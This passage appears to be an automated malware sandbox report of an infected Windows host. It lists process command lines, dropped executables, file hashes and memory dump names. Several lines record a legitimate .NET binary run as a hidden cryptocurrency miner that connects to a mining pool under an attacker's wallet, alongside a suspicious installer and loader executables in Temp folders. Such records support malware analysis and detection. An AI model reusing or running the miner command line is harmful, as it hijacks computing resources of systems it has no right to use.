C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DirectX11\em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=844,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=4348 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Network

Files

SHA512 779be83187b521f40104bd57e6fb5c3cdd8458eaeb93962c89248399392d8de48c520c1d8e55e188795bea44498007329e74961521754653417403406fa4d606

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e37d6ca34d98b0d73e2a45e7449ba464
SHA1 84cc433461212b1aecc8dba51c7d4b33850bdc30
SHA256 e6572bfe229c4946ee4595f04075f4e8aef4b2c80673d810cf6f277fa7a21e11
SHA512 8527ccc78e52c3d15a828e26a7a037cda40517e752fd981fe159a9c72f0bb1da62ecee4a0f7755bfc2bd0b615228cc550d817de36fee56cc1921e81314c252eb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 305dcaa4e1b55e14502f94afa8f88db1
SHA1 4d1d535fa6e2c09b6cc398896e93cc98dbb507da
SHA256 4666f7752e3c5285799733d61e087dc79604a48a1d216d34178756f5332fbe50
SHA512 df5a2f530a2fdfda7faee866610900e1887773605f4626cae7e4b7aad122429124a94821ccac85647a84e01a006a4a807efaadd24eb16d78611ba8b4ae92a2a8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e58d5621e7ea63f97d08b3396998978d
SHA1 8a38560bb0f313c8405596468db086744aae29a5
SHA256 f8f7a9f497b4f5c3bc3af271fe489a867570f4197fc732413d9fbe43439d0a83
SHA512 a4e9daf7f5aa272e29377cbfe53ccefe08f0c6db7a3083225b3d8b82101c9c8c15229fe54ef0cb01a7c6649fa04ae0c441753582c5fca9365f4c23bf3853eb73

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a9f98e0a70490bae6ce86f3dfe1d88b9
SHA1 4b949b1341dbadd0354b141f46b953dc2621a67e
SHA256 93e2b123ece5e240f2285c08241508c8d25d29927eaad4a26a8d58ec2b18f05f
SHA512 ecd3a1f3fc4988cee1da7d889125493631e2a3f4d94da330ad28c0eff00084b3c60caafe6a39041bc53836d82eb5bd330dfbedc06cc2ed87f2e4b15b630591cf

memory/8564-5242-0x0000000000790000-0x0000000000C3E000-memory.dmp

memory/8564-5246-0x0000000000790000-0x0000000000C3E000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 25155ac5d0540605ee10a74364f15e6c
SHA1 cfa951247cfc760a92218f1045d3baed417e3750
SHA256 17245cc4d9397154bf533178ac8ab2b2394d373928c7cfff4e59a569dd37db44
SHA512 7e94110dda6081093e7d9f739b8dc856e3ff5a85c177254047274c9efb6fd2a8ebdd6fd0d1418c92d2b42afdf280cd1b48aeb6536f636cc0f2f8ba4b445a1590